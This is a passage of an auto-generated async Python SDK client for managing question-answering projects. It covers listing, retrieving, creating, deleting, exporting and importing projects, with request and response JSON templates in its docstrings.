https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/list-projects
for more information.
:keyword top: The maximum number of resources to return from the collection. Default value is
None.
:paramtype top: int
:keyword skip: An offset into the collection of the first resource to be returned. Default
value is None.
:paramtype skip: int
:return: An iterator like instance of JSON object
:rtype: ~azure.core.async_paging.AsyncItemPaged[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Optional. Project creation
date-time.
"description": "str", # Optional. Description of the project.
"language": "str", # Optional. Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default.
"lastDeployedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last deployment date-time.
"lastModifiedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last modified date-time.
"multilingualResource": bool, # Optional. Resource enabled for multiple
languages across projects or not.
"projectName": "str", # Optional. Name of the project.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_projects_request(
top=top,
skip=skip,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
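    # Hypothetical async usage of the paging method above (client construction is
    # assumed to go through the public AuthoringClient wrapper; adjust the import
    # to your package version):
    # async for project in client.list_projects(top=10):
    #     print(project["projectName"])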
@distributed_trace_async
async def get_project_details(self, project_name: str, **kwargs: Any) -> JSON:
"""Get the requested project metadata.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/get-project-details
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:return: JSON object
:rtype: JSON
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Optional. Project creation
date-time.
"description": "str", # Optional. Description of the project.
"language": "str", # Optional. Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default.
"lastDeployedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last deployment date-time.
"lastModifiedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last modified date-time.
"multilingualResource": bool, # Optional. Resource enabled for multiple
languages across projects or not.
"projectName": "str", # Optional. Name of the project.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
request = build_get_project_details_request(
project_name=project_name,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, cast(JSON, deserialized), {})
return cast(JSON, deserialized)
@overload
async def create_project(
self, project_name: str, options: JSON, *, content_type: str = "application/json", **kwargs: Any
) -> JSON:
"""Create or update a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/create-project
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param options: Parameters needed to create the project. Required.
:type options: JSON
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:return: JSON object
:rtype: JSON
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
options = {
"language": "str", # Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default. Required.
"description": "str", # Optional. Description of the project.
"multilingualResource": bool, # Optional. Set to true to enable creating
knowledgebases in different languages for the same resource.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
# response body for status code(s): 200, 201
response == {
"createdDateTime": "2020-02-20 00:00:00", # Optional. Project creation
date-time.
"description": "str", # Optional. Description of the project.
"language": "str", # Optional. Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default.
"lastDeployedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last deployment date-time.
"lastModifiedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last modified date-time.
"multilingualResource": bool, # Optional. Resource enabled for multiple
languages across projects or not.
"projectName": "str", # Optional. Name of the project.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
"""
@overload
async def create_project(
self, project_name: str, options: IO, *, content_type: str = "application/json", **kwargs: Any
) -> JSON:
"""Create or update a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/create-project
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param options: Parameters needed to create the project. Required.
:type options: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:return: JSON object
:rtype: JSON
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 201
response == {
"createdDateTime": "2020-02-20 00:00:00", # Optional. Project creation
date-time.
"description": "str", # Optional. Description of the project.
"language": "str", # Optional. Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default.
"lastDeployedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last deployment date-time.
"lastModifiedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last modified date-time.
"multilingualResource": bool, # Optional. Resource enabled for multiple
languages across projects or not.
"projectName": "str", # Optional. Name of the project.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
"""
@distributed_trace_async
async def create_project(self, project_name: str, options: Union[JSON, IO], **kwargs: Any) -> JSON:
"""Create or update a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/create-project
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
        :param options: Parameters needed to create the project. Is either a model type or an IO type.
Required.
:type options: JSON or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:return: JSON object
:rtype: JSON
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 201
response == {
"createdDateTime": "2020-02-20 00:00:00", # Optional. Project creation
date-time.
"description": "str", # Optional. Description of the project.
"language": "str", # Optional. Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default.
"lastDeployedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last deployment date-time.
"lastModifiedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last modified date-time.
"multilingualResource": bool, # Optional. Resource enabled for multiple
languages across projects or not.
"projectName": "str", # Optional. Name of the project.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(options, (IO, bytes)):
_content = options
else:
_json = options
request = build_create_project_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 201:
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, cast(JSON, deserialized), {})
return cast(JSON, deserialized)
async def _delete_project_initial(self, project_name: str, **kwargs: Any) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
request = build_delete_project_request(
project_name=project_name,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@distributed_trace_async
async def begin_delete_project(self, project_name: str, **kwargs: Any) -> AsyncLROPoller[JSON]:
"""Delete the project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/delete-project
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Required.
"jobId": "str", # Required.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Required.
"status": "str", # Job Status. Required. Known values are: "notStarted",
"running", "succeeded", "failed", "cancelled", "cancelling", and
"partiallyCompleted".
"errors": [
{
"code": "str", # One of a server-defined set of error codes.
Required. Known values are: "InvalidRequest", "InvalidArgument",
"Unauthorized", "Forbidden", "NotFound", "ProjectNotFound",
"OperationNotFound", "AzureCognitiveSearchNotFound",
"AzureCognitiveSearchIndexNotFound", "TooManyRequests",
"AzureCognitiveSearchThrottling",
"AzureCognitiveSearchIndexLimitReached", "InternalServerError", and
"ServiceUnavailable".
"message": "str", # A human-readable representation of the
error. Required.
"details": [
...
],
"innererror": {
"code": "str", # One of a server-defined set of
error codes. Required. Known values are: "InvalidRequest",
"InvalidParameterValue", "KnowledgeBaseNotFound",
"AzureCognitiveSearchNotFound", "AzureCognitiveSearchThrottling", and
"ExtractionFailure".
"message": "str", # Error message. Required.
"details": {
"str": "str" # Optional. Error details.
},
"innererror": ...,
"target": "str" # Optional. Error target.
},
"target": "str" # Optional. The target of the error.
}
],
"expirationDateTime": "2020-02-20 00:00:00" # Optional.
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_project_initial( # type: ignore
project_name=project_name, cls=lambda x, y, z: x, headers=_headers, params=_params, **kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
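    # Sketch of driving the long-running operation above (the project name is a
    # placeholder):
    # poller = await client.begin_delete_project("my-project")
    # await poller.result()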
async def _export_initial(
self, project_name: str, *, file_format: str = "json", asset_kind: Optional[str] = None, **kwargs: Any
) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
request = build_export_request(
project_name=project_name,
file_format=file_format,
asset_kind=asset_kind,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@distributed_trace_async
async def begin_export(
self, project_name: str, *, file_format: str = "json", asset_kind: Optional[str] = None, **kwargs: Any
) -> AsyncLROPoller[JSON]:
"""Export project metadata and assets.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/export
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword file_format: Knowledge base Import or Export format. Known values are: "json", "tsv",
and "excel". Default value is "json".
:paramtype file_format: str
:keyword asset_kind: Kind of the asset of the project. Known values are: "qnas" and "synonyms".
Default value is None.
:paramtype asset_kind: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Required.
"jobId": "str", # Required.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Required.
"resultUrl": "str", # URL to download the result of the Export Job.
Required.
"status": "str", # Job Status. Required. Known values are: "notStarted",
"running", "succeeded", "failed", "cancelled", "cancelling", and
"partiallyCompleted".
"errors": [
{
"code": "str", # One of a server-defined set of error codes.
Required. Known values are: "InvalidRequest", "InvalidArgument",
"Unauthorized", "Forbidden", "NotFound", "ProjectNotFound",
"OperationNotFound", "AzureCognitiveSearchNotFound",
"AzureCognitiveSearchIndexNotFound", "TooManyRequests",
"AzureCognitiveSearchThrottling",
"AzureCognitiveSearchIndexLimitReached", "InternalServerError", and
"ServiceUnavailable".
"message": "str", # A human-readable representation of the
error. Required.
"details": [
...
],
"innererror": {
"code": "str", # One of a server-defined set of
error codes. Required. Known values are: "InvalidRequest",
"InvalidParameterValue", "KnowledgeBaseNotFound",
"AzureCognitiveSearchNotFound", "AzureCognitiveSearchThrottling", and
"ExtractionFailure".
"message": "str", # Error message. Required.
"details": {
"str": "str" # Optional. Error details.
},
"innererror": ...,
"target": "str" # Optional. Error target.
},
"target": "str" # Optional. The target of the error.
}
],
"expirationDateTime": "2020-02-20 00:00:00" # Optional.
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._export_initial( # type: ignore
project_name=project_name,
file_format=file_format,
asset_kind=asset_kind,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
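# A usage sketch for begin_export, assuming the async client constructed in
# the sketch above; "my-project" is a placeholder project name:
#
#     poller = await client.begin_export("my-project", file_format="json")
#     job = await poller.result()
#     print(job["resultUrl"])  # download URL for the exported assets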
async def _import_assets_initial(
self,
project_name: str,
options: Optional[Union[JSON, IO]] = None,
*,
file_format: str = "json",
asset_kind: Optional[str] = None,
**kwargs: Any
) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(options, (IO, bytes)):
_content = options
else:
_json = options
request = build_import_assets_request(
project_name=project_name,
file_format=file_format,
asset_kind=asset_kind,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@overload
async def begin_import_assets(
self,
project_name: str,
options: Optional[JSON] = None,
*,
file_format: str = "json",
asset_kind: Optional[str] = None,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[JSON]:
"""Import project assets.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/import
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param options: Project assets that need to be imported. Default value is None.
:type options: JSON
:keyword file_format: Knowledge base Import or Export format. Known values are: "json", "tsv",
and "excel". Default value is "json".
:paramtype file_format: str
:keyword asset_kind: Kind of the asset of the project. Known values are: "qnas" and "synonyms".
Default value is None.
:paramtype asset_kind: str
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
options = {
"assets": {
"qnas": [
{
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional.
Question chosen as the head of suggested questions cluster by
Active Learning clustering algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount":
0, # Optional. The number of times the question was
suggested automatically by the Active Learning
algorithm.
"question": "str", #
Optional. Question suggested by the Active Learning
feature.
"userSuggestedCount":
0 # Optional. The number of times the question was
suggested explicitly by the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark
if a prompt is relevant only with a previous question or not. If
true, do not include this QnA as answer for queries without
context; otherwise, ignores context and includes this QnA in
answers.
"prompts": [
{
"displayOrder": 0, #
Optional. Index of the prompt. It is used for ordering of
the prompts.
"displayText": "str", #
Optional. Text displayed to represent a follow up
question prompt.
"qna": {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question
chosen as the head of suggested questions
cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional.
The number of times the question was
suggested automatically by the Active
Learning algorithm.
"question": "str", # Optional.
Question suggested by the Active
Learning feature.
"userSuggestedCount": 0 # Optional.
The number of times the question was
suggested explicitly by the user.
}
]
}
],
"answer": "str", #
Optional. Answer text.
"dialog": ...,
"id": 0, # Optional.
Unique ID for the QnA.
"metadata": {
"str": "str"
# Optional. Metadata associated with the answer,
useful to categorize or filter question answers.
},
"questions": [
"str" #
Optional. List of questions associated with the
answer.
],
"source": "str" #
Optional. Source from which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
},
"qnaId": 0 # Optional. ID of
the QnA corresponding to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"lastUpdatedDateTime": "2020-02-20 00:00:00", #
Optional. Date-time when the QnA was last updated.
"metadata": {
"str": "str" # Optional. Metadata associated
with the answer, useful to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions
associated with the answer.
],
"source": "str", # Optional. Source from which QnA
was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
"sourceDisplayName": "str" # Optional. Friendly name
of the Source.
}
],
"synonyms": [
{
"alterations": [
"str" # Collection of word alterations.
Required.
]
}
]
},
"fileUri": "str", # Optional. Import data File URI.
"metadata": {
"language": "str", # Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for
Spanish etc. If not set, use "en" for English as default. Required.
"description": "str", # Optional. Description of the project.
"multilingualResource": bool, # Optional. Set to true to enable
creating knowledgebases in different languages for the same resource.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response
when no good match is found in the knowledge base.
}
}
}
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Required.
"jobId": "str", # Required.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Required.
"status": "str", # Job Status. Required. Known values are: "notStarted",
"running", "succeeded", "failed", "cancelled", "cancelling", and
"partiallyCompleted".
"errors": [
{
"code": "str", # One of a server-defined set of error codes.
Required. Known values are: "InvalidRequest", "InvalidArgument",
"Unauthorized", "Forbidden", "NotFound", "ProjectNotFound",
"OperationNotFound", "AzureCognitiveSearchNotFound",
"AzureCognitiveSearchIndexNotFound", "TooManyRequests",
"AzureCognitiveSearchThrottling",
"AzureCognitiveSearchIndexLimitReached", "InternalServerError", and
"ServiceUnavailable".
"message": "str", # A human-readable representation of the
error. Required.
"details": [
...
],
"innererror": {
"code": "str", # One of a server-defined set of
error codes. Required. Known values are: "InvalidRequest",
"InvalidParameterValue", "KnowledgeBaseNotFound",
"AzureCognitiveSearchNotFound", "AzureCognitiveSearchThrottling", and
"ExtractionFailure".
"message": "str", # Error message. Required.
"details": {
"str": "str" # Optional. Error details.
},
"innererror": ...,
"target": "str" # Optional. Error target.
},
"target": "str" # Optional. The target of the error.
}
],
"expirationDateTime": "2020-02-20 00:00:00" # Optional.
}
"""
@overload
async def begin_import_assets(
self,
project_name: str,
options: Optional[IO] = None,
*,
file_format: str = "json",
asset_kind: Optional[str] = None,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[JSON]:
"""Import project assets.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/import
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param options: Project assets that need to be imported. Default value is None.
:type options: IO
:keyword file_format: Knowledge base Import or Export format. Known values are: "json", "tsv",
and "excel". Default value is "json".
:paramtype file_format: str
:keyword asset_kind: Kind of the asset of the project. Known values are: "qnas" and "synonyms".
Default value is None.
:paramtype asset_kind: str
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Required.
"jobId": "str", # Required.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Required.
"status": "str", # Job Status. Required. Known values are: "notStarted",
"running", "succeeded", "failed", "cancelled", "cancelling", and
"partiallyCompleted".
"errors": [
{
"code": "str", # One of a server-defined set of error codes.
Required. Known values are: "InvalidRequest", "InvalidArgument",
"Unauthorized", "Forbidden", "NotFound", "ProjectNotFound",
"OperationNotFound", "AzureCognitiveSearchNotFound",
"AzureCognitiveSearchIndexNotFound", "TooManyRequests",
"AzureCognitiveSearchThrottling",
"AzureCognitiveSearchIndexLimitReached", "InternalServerError", and
"ServiceUnavailable".
"message": "str", # A human-readable representation of the
error. Required.
"details": [
...
],
"innererror": {
"code": "str", # One of a server-defined set of
error codes. Required. Known values are: "InvalidRequest",
"InvalidParameterValue", "KnowledgeBaseNotFound",
"AzureCognitiveSearchNotFound", "AzureCognitiveSearchThrottling", and
"ExtractionFailure".
"message": "str", # Error message. Required.
"details": {
"str": "str" # Optional. Error details.
},
"innererror": ...,
"target": "str" # Optional. Error target.
},
"target": "str" # Optional. The target of the error.
}
],
"expirationDateTime": "2020-02-20 00:00:00" # Optional.
}
"""
@distributed_trace_async
async def begin_import_assets(
self,
project_name: str,
options: Optional[Union[JSON, IO]] = None,
*,
file_format: str = "json",
